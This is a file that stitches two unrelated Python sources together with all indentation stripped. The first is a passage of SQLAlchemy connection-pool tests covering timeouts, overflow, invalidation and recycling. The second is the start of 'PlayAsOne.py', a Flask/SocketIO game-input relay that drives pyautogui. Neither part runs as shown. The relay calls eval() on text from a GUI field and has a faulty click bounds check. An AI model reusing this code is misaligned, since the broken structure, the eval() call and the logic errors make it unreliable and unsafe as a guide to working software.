event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown_test(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
"""test for :ticket:`2964`, where the pool would not mutex the
initialization of the dialect.
Unfortunately, as discussed in :ticket:`6337`, this test suite did not
ensure that the ``Engine`` itself actually uses the "first_connect" event,
so when :ticket:`5497` came along, the "first_connect" event was no longer
used and no test detected the re-introduction of the exact same race
condition, which was now worse as the un-initialized dialect would now
pollute the SQL cache causing the application to not work at all.
A new suite has therefore been added in test/engine/test_execute.py->
OnConnectTest::test_initialize_connect_race to ensure that the engine
in total synchronizes the "first_connect" process, which now works
using a new events feature _exec_w_sync_on_first_run.
"""
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
# what we're trying to do here is have concurrent use of
# all three pooled connections at once, and the thing we want
# to test is that first_connect() finishes completely before
# any of the connections get returned. so first_connect()
# sleeps for one second, then pings the mock. the threads should
# not have made it to the "checkout() event for that one second.
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
# there is a very unlikely condition observed in CI on windows
# where even though we have five threads above all calling upon the
# pool, we didn't get concurrent use of all three connections, two
# connections were enough. so here we purposely just check out
# all three at once just to get a consistent test result.
make_sure_all_three_are_connected = [pool.connect() for i in range(3)]
for conn in make_sure_all_three_are_connected:
conn.close()
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
eq_(status(p), (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.timing_intensive
def test_timeout_subsecond_precision(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0, timeout=0.5)
c1 = p.connect() # noqa
with expect_raises(tsa.exc.TimeoutError):
now = time.time()
c2 = p.connect() # noqa
# Python timing is not very accurate, the time diff should be very
# close to 0.5s but we give 200ms of slack.
assert 0.3 <= time.time() - now <= 0.7, "Pool timeout not respected"
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
reaper = testing.engines.ConnectionKiller()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
reaper.add_pool(p)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
reaper.assert_all_closed()
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
with mutex:
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.dbapi_connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.dbapi_connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.dbapi_connection
c2_con = c2.dbapi_connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.dbapi_connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.dbapi_connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.dbapi_connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.dbapi_connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not(c3.dbapi_connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.dbapi_connection)
c1.close()
c2 = p.connect()
is_(c2.dbapi_connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.dbapi_connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not(c3.dbapi_connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.dbapi_connection)
c1.close()
c2 = p.connect()
is_(c2.dbapi_connection, c_ref())
c2_rec = c2._connection_record
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
c2.invalidate(soft=True)
is_(c2_rec.dbapi_connection, c2.dbapi_connection)
c2.close()
c3 = p.connect()
is_not(c3.dbapi_connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.dbapi_connection, c3.dbapi_connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises_context_ok(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.dbapi_connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
@testing.requires.timing_intensive
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.dbapi_connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.combinations((True,), (False,))
def test_userspace_disconnectionerror_weakref_finalizer(self, detach_gced):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, _is_asyncio=detach_gced
)
if detach_gced:
pool._dialect.is_async = True
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.dbapi_connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.dbapi_connection
del conn
gc_collect()
if detach_gced:
# new connection was detached + abandoned on return
eq_(dbapi_conn.mock_calls, [])
else:
# new connection reset and returned to pool
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.dbapi_connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.dbapi_connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.dbapi_connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.dbapi_connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.dbapi_connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.dbapi_connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.dbapi_connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.dbapi_connection
c1.invalidate()
assert c1.dbapi_connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.dbapi_connection is not c1_con
c2_con = c2.dbapi_connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_no_double_checkin(self):
p = self._queuepool_fixture(pool_size=1)
c1 = p.connect()
rec = c1._connection_record
c1.close()
assert_raises_message(
Warning, "Double checkin attempted on %s" % rec, rec.checkin
)
def test_lifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator, use_lifo=True)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
for i in range(5):
pc1 = p.connect()
is_(pc1.dbapi_connection, c3)
pc1.close()
pc1 = p.connect()
is_(pc1.dbapi_connection, c3)
pc2 = p.connect()
is_(pc2.dbapi_connection, c2)
pc2.close()
pc3 = p.connect()
is_(pc3.dbapi_connection, c2)
pc2 = p.connect()
is_(pc2.dbapi_connection, c1)
pc2.close()
pc3.close()
pc1.close()
def test_fifo(self):
c1, c2, c3 = Mock(), Mock(), Mock()
connections = [c1, c2, c3]
def creator():
return connections.pop(0)
p = pool.QueuePool(creator)
pc1 = p.connect()
pc2 = p.connect()
pc3 = p.connect()
pc1.close()
pc2.close()
pc3.close()
pc1 = p.connect()
is_(pc1.dbapi_connection, c1)
pc1.close()
pc1 = p.connect()
is_(pc1.dbapi_connection, c2)
pc2 = p.connect()
is_(pc2.dbapi_connection, c3)
pc2.close()
pc3 = p.connect()
is_(pc3.dbapi_connection, c1)
pc2 = p.connect()
is_(pc2.dbapi_connection, c3)
pc2.close()
pc3.close()
pc1.close()
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return="rollback")
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return="commit")
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
# TODO: the SingletonThreadPool cleanup method
# has an unfixed race condition within the "cleanup" system that
# leads to this test being off by one connection under load; in any
# case, this connection will be closed once it is garbage collected.
# this pool is not a production-level pool and is only used for the
# SQLite "memory" connection, and is not very useful under actual
# multi-threaded conditions
# @testing.requires.threading_with_mock
# def test_cleanup_no_gc(self):
# self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.dbapi_connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(0.01)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
lp = len(p._all_conns)
is_true(3 <= lp <= 4)
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
def test_no_rollback_from_nested_connections(self):
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
c1 = p.connect()
mock_conn = c1.dbapi_connection
c2 = p.connect()
is_(c1, c2)
c2.close()
eq_(mock_conn.mock_calls, [])
c1.close()
eq_(mock_conn.mock_calls, [call.rollback()])
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect("foo.db"))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[call("foo.db"), call("foo.db")], any_order=True
)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
def test_connect(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect("foo.db")
p = pool.StaticPool(creator)
c1 = p.connect()
conn = c1.dbapi_connection
c1.close()
c2 = p.connect()
is_(conn, c2.dbapi_connection)
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
PlayAsOne.py | #! usr/bin/env python2
from flask import Flask, request, flash, url_for, redirect, render_template, abort, send_from_directory, jsonify
from flask.ext.socketio import SocketIO, emit
from json import loads, dumps
import Tkinter as tk
import pyautogui
import threading
import ttk
import time
import sys
if sys.platform == 'win32':
import win32gui
if sys.platform == 'darwin':
pass
class PlayAsOne:
def __init__(self):
self.gui = GUI(self)
self.running = False
def start(self):
if not self.find_game_window():
self.gui.status_label.config(text='Could not locate the window!')
self.running = True
self.gui.start_button.config(text='Stop', command=self.stop)
self.gui.status_label.config(text='Running')
self.gui.titlebar_entry.config(state='disabled')
self.gui.mode_combobox.config(state='disabled')
self.gui.input_mode_combobox.config(state='disabled')
self.gui.interval_entry.config(state='disabled')
threading.Thread(target=socketio.run, args=(app,), kwargs={'host': '18.111.92.199', 'port':3000}).start()
threading.Thread(target=self.regulate_democracy).start()
def stop(self):
self.gui.start_button.config(text='Start', command=self.start)
self.gui.status_label.config(text='Not Running')
self.gui.titlebar_entry.config(state='normal')
self.gui.mode_combobox.config(state='normal')
self.gui.input_mode_combobox.config(state='normal')
self.gui.interval_entry.config(state='normal')
self.running = False
def regulate_democracy(self):
while self.running:
execute_democracy()
time.sleep(self.get_democracy_interval())
def is_running(self):
return self.running
def get_mode(self):
return self.gui.mode_combobox.get()
def get_input_mode(self):
return self.gui.input_mode_combobox.get()
def get_democracy_interval(self):
try:
return_code = int(self.gui.interval_entry.get())
return return_code
except ValueError:
return 0
def find_game_window(self):
if sys.platform == 'win32':
winlist = []
def enum_cb(hwnd, extra):
winlist.append((hwnd, win32gui.GetWindowText(hwnd)))
win32gui.EnumWindows(enum_cb, None)
window = [
(hwnd, title) for hwnd, title in winlist if self.gui.titlebar_entry.get().lower() in title.lower()]
if not window:
return False
window = window[0]
hwnd = window[0]
win32gui.ShowWindow(hwnd, 11)
win32gui.ShowWindow(hwnd, 1)
win32gui.SetForegroundWindow(hwnd)
region = win32gui.GetWindowRect(hwnd)
region = (
region[0],
region[1],
region[2]-region[0],
region[3]-region[1]
)
return region
return False
def send_key(self, key):
if not self.running:
return
self.find_game_window()
try:
wrapdict = eval(self.gui.wrap_entry.get())
if key.lower() in wrapdict:
key = wrapdict[key.lower()]
except ValueError:
pass
pyautogui.press(str(key))
def send_mouse_click(self, x, y, button):
if not self.running:
return
window_region = self.find_game_window()
if x < window_region[0]:
return
if y < window_region[1]:
return
if x > window_region[2]:
return
if y > window_region[2]:
return
pyautogui.click(x=x, y=y, button=button)
class GUI(tk.Tk):
def __init__(self, server):
tk.Tk.__init__(self)
self.server = server
self.mode_frame = tk.Frame(self)
self.mode_frame.grid(row=0, column=0, columnspan=2)
self.mode_label = tk.Label(self.mode_frame, text='Mode: ')
self.mode_label.grid(row=0, column=0, sticky='w')
self.mode_combobox = ttk.Combobox(
self.mode_frame, state='readonly', width=9, values=('Chaos', 'Democracy'))
self.mode_combobox.set('Chaos')
self.mode_combobox.grid(row=0, column=1, sticky='ew')
self.input_mode_label = tk.Label(self.mode_frame, text='Input Mode: ')
self.input_mode_label.grid(row=1, column=0, sticky='w')
self.input_mode_combobox = ttk.Combobox(
self.mode_frame, state='readonly', width=13, values=('NES', 'SNES', 'Full Keyboard'))
self.input_mode_combobox.set('Full Keyboard')
self.input_mode_combobox.grid(row=1, column=1, sticky='ew')
